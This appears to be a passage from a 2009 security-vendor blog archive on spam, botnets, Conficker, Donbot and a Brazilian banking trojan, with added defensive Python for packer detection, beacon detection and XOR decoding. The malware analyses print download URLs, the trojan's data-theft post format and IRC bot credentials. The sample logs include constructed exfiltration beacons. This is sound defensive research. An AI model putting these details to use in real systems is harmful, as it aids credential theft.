Archive for the 'Bot and BotNet Research' Category

DDoS Not the Most Political Way to Protest

So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

http://www.leader.ir/
http://president.ir/
http://www.irib.ir/
http://www.iribnews.ir/

and some specific URLs on those domains.

No guys, that’s not the right path and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

New McAfee Whitepaper on Browser Attacks

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

McAfee Releases June Spam Report

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking links in spam, so that spammers don’t learn that our address is live, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long as we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Who Digs the Elephant Trap?

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To tell which is which, an AV product has to know what is “under” the protecting envelope. Unfortunately, that simply cannot be done quickly. It takes computing cycles.
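As an added illustration (not code from the original post), the following Python script applies the two cheap checks an engine or an analyst runs before any expensive unpacking: it parses the PE section table and looks for section names that well-known packers leave behind, and it computes the Shannon entropy of each section, since compressed or encrypted bodies sit close to 8 bits per byte. The section-name table, the 7.0 threshold and the minimal PE images it builds to demonstrate itself are assumptions constructed for this example; a real binary would be read from disk instead. Note what the script cannot do, which is the point of the post: the heuristics are fast, but knowing whether the payload under a Themida envelope is a game or a spam-bot still requires looking inside.

```python
import math
import random
import struct

# Section names that common packers/protectors leave in the PE section table.
# Constructed lookup for this example; a heuristic, not a vendor signature.
PACKER_SECTION_NAMES = {
    b"UPX0": "UPX", b"UPX1": "UPX", b"UPX2": "UPX",
    b".petite": "Petite",
    b".themida": "Themida", b".winlice": "WinLicense",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, close to 8.0 for random bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table.
    Returns a list of (name, raw_bytes) in file order."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size             # section headers are 40 bytes each
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name = pe[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess(pe: bytes, entropy_threshold: float = 7.0):
    """Return findings: known packer section names, plus sections whose raw
    bytes look compressed or encrypted (high entropy, non-trivial size)."""
    findings = []
    for name, data in parse_sections(pe):
        label = name.decode("ascii", "replace")
        packer = PACKER_SECTION_NAMES.get(name)
        if packer:
            findings.append(f"section {label} -> {packer}")
        ent = shannon_entropy(data)
        if len(data) >= 256 and ent > entropy_threshold:
            findings.append(f"section {label} entropy {ent:.2f}")
    return findings


def build_minimal_pe(sections):
    """Construct a minimal, non-runnable PE image with the given (name, data)
    sections so the example runs offline. The optional header is left zeroed."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    headers_len = e_lfanew + 4 + len(coff) + opt_size + 40 * len(sections)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF  # 512-byte file alignment
    table, body = b"", b""
    for name, data in sections:
        table += name.ljust(8, b"\0")
        table += struct.pack("<IIII", len(data), 0x1000, len(data), raw_ptr + len(body))
        table += b"\0" * 16                  # relocs / line numbers / characteristics
        body += data
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + b"\0" * (raw_ptr - headers_len) + body


def demo_findings():
    """Constructed samples: a UPX-style image whose UPX1 body is random (as a
    compressed body looks) next to a plain image with a low-entropy .text section."""
    rng = random.Random(1)
    compressed_like = bytes(rng.getrandbits(8) for _ in range(4096))
    packed_pe = build_minimal_pe([(b"UPX0", b""), (b"UPX1", compressed_like)])
    plain_pe = build_minimal_pe([(b".text", b"Hello, world. This is ordinary program text.\n" * 90)])
    return assess(packed_pe), assess(plain_pe)


if __name__ == "__main__":
    packed, plain = demo_findings()
    print("packed sample:", packed or "nothing suspicious")
    print("plain sample: ", plain or "nothing suspicious")
```

Both checks are easy to defeat (a protector can rename its sections and pad with low-entropy filler), which is why they only decide whether the expensive path is worth taking, not what the file is.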

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a trustworthy software technology any longer, because they have been misused so much. Do not use them if you can avoid it.

Double Strike by AMTSO

It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Testing Standards Organization (www.amtso.org). The awesome historic surroundings set the mood for our discussions.

 Budapest

Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009”), it is clear that we need transparent and fair testing more than ever.

AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

AMTSO documents

But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

  • The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased, I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell of agreeing on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
  • “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

McAfee Unveils H*Commerce Web Film Series on Cybercrime

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

Fight Against Cybercrime Gets Organized

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Initiative to Fight Cybercrime has been in force for more than half a year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the official program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future! ;)

McAfee Releases First-Quarter Threats Report

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

Swine Flu Subjects and e-Pharmacy Sites

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

Swine Flu Spams

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

Swine Flu e-Pharm Site

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

A closer look at a Swine Flu spam

It’s been just a few days since we started talking about spam that uses Swine Flu to catch users’ attention and sell pills. This time, however, the message is not very “healthy”:

Swine Flu

The message above is in Portuguese and goes roughly like this: “For those who still don’t know, the pictures below show the terminal stage of Swine Flu. The experts are trying to calm people down, but the pictures show that calming down is the only thing we shouldn’t do. See what the patient becomes like in the advanced stage.”

As we saw yesterday in David’s post, Brazil is the number one source of spam related to Swine Flu. In this case the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch users’ attention. But remember, this is spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar
=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver
=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-Banker-gen.g respectively.

The file Foto.29.04.2009.com is a downloader that fetches the URL below and drops it as C:\WINDOWS\temp\configura.exe (despite the .gif extension, the content is an executable):

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

This file is identified as PWS-Banker-gen.b.

This is a common banker malware that overlays a fake image on top of the real banking site. Here is an example sequence: the user is told his account will be suspended if he doesn’t update his information with the bank, and he is then asked to enter his personal information and even his credit card data:

overlayed bank image

overlayed bank image

overlayed bank image

The information about the hacked machine and the banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php
hxxp://[removed-2].100webspace.net/post.php
hxxp://[removed-3].100webspace.net/post.php
hxxp://[removed-4].100webspace.net/post.php

This is the string appended to the URLs above (the machine name and user name are filled in at run time):

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&
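As an added example (not part of the original post), here is a small Python detector for the check-in described above. It recognizes URLs of the form seen here, a post.php under 100webspace.net carrying tipo=inf, tip=<machine>+<user> and inf=INFECTADO, decodes the victim fields, and runs that check over a few constructed proxy log lines. The log format, the client addresses and the sub-domain names are invented for the example; the redacted hosts in the post are not known, so the check matches any host under that provider rather than a fixed list.

```python
import re
from urllib.parse import parse_qs, urlsplit

# From the post: the bot posts to post.php on throw-away 100webspace.net accounts.
BEACON_HOST_SUFFIX = ".100webspace.net"
BEACON_PATH = "/post.php"

# Constructed proxy-log format for this example: <epoch> <client> <status> <method> <url>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def parse_beacon(url: str):
    """Return the decoded check-in fields if `url` matches the banker's beacon, else None.
    The query looks like: tipo=inf&tip=<machine>+<user>&inf=INFECTADO%0D%0A&"""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host.endswith(BEACON_HOST_SUFFIX) or parts.path != BEACON_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # '+' -> ' ', %0D%0A -> CRLF
    if qs.get("tipo") != ["inf"]:
        return None
    status = qs.get("inf", [""])[0].strip()
    if not status.startswith("INFECTADO"):
        return None
    machine, _, user = qs.get("tip", [""])[0].partition(" ")
    return {"host": host, "machine": machine, "user": user, "status": status}


def scan_log(text: str):
    """Run parse_beacon over each log line; return the hits with the client IP attached."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        beacon = parse_beacon(m["url"])
        if beacon:
            beacon["client"] = m["client"]
            hits.append(beacon)
    return hits


# Constructed sample log: one infected workstation beaconing, two benign requests,
# and an unrelated page on the same hosting provider (must not match).
SAMPLE_LOG = """\
1240992001.123 10.0.0.7 TCP_MISS/200 GET http://www.example.org/index.html
1240992002.456 10.0.0.7 TCP_MISS/200 POST http://drop-site-1.100webspace.net/post.php?tipo=inf&tip=WKS01+maria&inf=INFECTADO%0D%0A&
1240992003.789 10.0.0.9 TCP_MISS/200 GET http://www.example.org/about.html
1240992004.012 10.0.0.9 TCP_MISS/200 GET http://some-hobby-page.100webspace.net/index.html
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['host']}: machine={hit['machine']} "
              f"user={hit['user']} ({hit['status']})")
```

The match is deliberately on the query shape rather than on a host name, because the drop accounts are disposable: the next variant will use a fresh sub-domain, but the check-in format tends to survive.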

 

But one image inside this malware caught our attention. The image below imitates the website of SENASP, Brazil’s National Public Security Secretariat, a site used by Brazilian law enforcement agents to look up information about Brazilian citizens:

overlayed bank image

They attempt to steal usernames and passwords for this site. If the miscreants got access to it they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see, an apparently innocent e-mail could cause your banking information to be stolen, and could have even more serious implications, as in the case above.

Looking at Swine Flu Spam Globally

Following up on Chris Barton’s excellent blog post the other day on swine flu spam, we wanted to take a closer look at the numbers.

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend, and almost certainly not together in the same subject line, so we started there. Using our TrustedSource technology and intel I was able to pull the following chart on the sheer growth in the use of “swine flu” as a subject over the last several days:

Percent Increase of Swine Flu in Subject Line

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world. That is not really a surprise when one considers the global nature of botnets and spam, but the country breakdown is interesting to look at. Brazil, the United States and Germany are the biggest sources at the moment:

Countries Sending Swine Flu Spam

No safe country from spammers, eh? When you consider that on any given day there are between 80 and 170 billion email messages, with 78 to 90 percent of them being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal, and it is very hard to protect against.

April Email and Spam Volumes

We have also seen sites with the words “swine” and “flu” pushing malware. In this case it’s a redirect to a Russian-based site that requires our old friend the fake codec to be installed to view the movie:

Swine Flu Redirect to Fake Codec

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Mac Malware In The News

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we discussed in our previous blog post, it is spread through pirated software at this point (a huge no-no anyway), so hopefully distribution will be light and will not result in large numbers. It definitely does highlight the need for security software regardless of platform!

The Carbon Footprint of Spam

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

Conficker on the prowl after the 1st…

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendezvous to start its latest escapade. In this case the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, this time initiated by the infected host.

Conficker is definitely not in any rush to tango. The exchange is done in such a manner that this traffic (that is, the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play: the infected host goes out to an address and downloads an encrypted executable. Once decrypted and executed, it could turn out to be malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the screenshots below:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch - so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first is that we have a new deadline to watch: on May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the IP is already in the list, it moves on to the next domain in its list.

Of course, we will update if anything else comes along…

Donbot - Joining The Club of Million Dollar Botnets

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits introduced in Windows XP Service Pack 2 and newer. We detect this rootkit as Generic Rootkit.g trojan. The worm then establishes an outbound connection to a remote IRC server using the following credentials:

  • PASS h4xg4ng
  • NICK [00-USA-XP-9215671]
  • USER SP2-ojd, followed by the name of the infected computer.

This worm does indeed exploit the MS08-067 vulnerability, and uses a download-and-execute shellcode that behaves identically to Conficker’s exploit, with only some differences in implementation. It is encoded with a simple 1-byte XOR key and looks like any other standard PEB-walking shellcode that resolves API libraries (for example urlmon.dll) and calls URLDownloadToFile() to fetch the malware from already-infected systems onto new targets. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and installs an executable named 66.scr instead.
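As an added example (not code from the post, and not the worm’s), the following Python script does what an analyst does with a blob like this: try every single-byte XOR key, score each decoding by the presence of strings a download-and-execute stager needs (urlmon.dll, URLDownloadToFileA, an http:// URL), and dump the printable strings from the best candidate. The sample “shellcode” and its key 0x5A are constructed here; the payload URL uses a TEST-NET address and borrows only the 66.scr file name from the post.

```python
import string

# Strings a download-and-execute stager needs; finding them in a decoding
# is strong evidence that the key is right.
MARKERS = (b"urlmon.dll", b"URLDownloadToFileA", b"LoadLibraryA",
           b"GetProcAddress", b"http://")
_PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def marker_hits(candidate: bytes) -> int:
    return sum(candidate.count(m) for m in MARKERS)


def printable_ratio(data: bytes) -> float:
    return sum(b in _PRINTABLE for b in data) / max(len(data), 1)


def brute_force_xor(blob: bytes):
    """Try all 256 single-byte keys. Returns (key, decoded, hits) for the
    decoding with the most marker strings (ties broken by printable ratio),
    or None if no key reveals any marker."""
    best = None
    for key in range(256):
        cand = xor_bytes(blob, key)
        hits = marker_hits(cand)
        if hits == 0:
            continue
        rank = (hits, printable_ratio(cand))
        if best is None or rank > best[0]:
            best = (rank, key, cand)
    if best is None:
        return None
    (hits, _ratio), key, cand = best
    return key, cand, hits


def extract_strings(data: bytes, min_len: int = 4):
    """Return runs of printable ASCII at least min_len long, like `strings`."""
    out, cur = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


# Constructed stand-in for a stager: filler opcodes plus the strings such code
# carries. The TEST-NET address is invented; only the 66.scr name is from the post.
SAMPLE_PLAIN = (b"\x90" * 8 + b"\xe8\x00\x00\x00\x00"
                + b"urlmon.dll\x00"
                + b"URLDownloadToFileA\x00"
                + b"http://198.51.100.23/66.scr\x00")
SAMPLE_KEY = 0x5A
SAMPLE_ENCODED = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    result = brute_force_xor(SAMPLE_ENCODED)
    if result is None:
        print("no single-byte XOR key revealed known strings")
    else:
        key, decoded, hits = result
        print(f"key=0x{key:02x} marker hits={hits}")
        for s in extract_strings(decoded):
            print("  ", s)
```

A key of 0 is tried too, so a blob that was never encoded still scores, and a blob that hides its strings by building them on the stack scores nothing under any key; the second case is the signal to fall back to emulation.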

ShellCode

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tool development and automation. As we can see, the latest version of Metasploit is used not only by whitehats for vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is no exception: it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as DCERPC service connection testing code from the “client.rb” module. By using these routines, the new worm can conveniently determine which operating system and service pack it is targeting, to achieve a better infection success rate. The order in which W32/IRCbot.gen.a sends the attack packets is identical to Metasploit’s MS08-067 module (ms08_067_netapi.rb):

WireShark

Both Conficker and W32/IRCbot.gen.a use open source tools to their advantage in the same way, to make their work much easier.

We went on to investigate the additional sites the worm connects to and the payload it tries to download. Packet sniffer logs show that it accesses at least two other remote servers:

  • hxxp://98.1[infected].42:443/n
  • hxxp://74.2[infected].90:88/jueo.exe

While the first server was not showing any activity at the time of research, the second server is still active and hosts additional malware that is installed on infected machines:

VirusTotal

Well, hello Donbot! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, appears to be a component of an active botnet called Donbot (also known as Bachsoy). Donbot components typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Most AV vendors, with a few exceptions, seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top five most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets, as they might not get another chance like the MS08-067 exploit for a long time.

This also serves as yet another reminder that there could well be many computers on the Internet that still do not have the latest security updates installed, more than five months after the release of the MS08-067 patch.

Conficker.C Over The Wire

A lot has already been written about Conficker. There have been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of Conficker.C’s behavior.

We set up a small testbed with a machine infected with Conficker.C in a controlled environment and another Linux box customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: the pre-April 1st phase and the April 1st phase.

During the pre-April 1st phase we observed the following.

Conficker.C gets the current time from some popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website, followed by an HTTP GET request to that IP address; the date is taken from the HTTP response. The figure below illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP and TCP scans. The volume of the UDP scans was particularly high, roughly 2-3 UDP queries per second, and seemed to taper off as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports open, there were a large number of ICMP messages received: port unreachable, host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the responses to the HTTP date check queries, so that for every website Conficker.C queries it gets a response with a Date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only two date sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.
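As an added example (not the authors’ tooling), this Python snippet shows the header-rewriting half of that trick: given a raw HTTP response, it replaces (or adds) the Date header so that a client reading it sees April 1st, 2009, and it also shows what a time check that parses the header would conclude before and after. The sample responses are constructed; the other date source, the local system clock, is set through the OS and is not covered here.

```python
import re
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime

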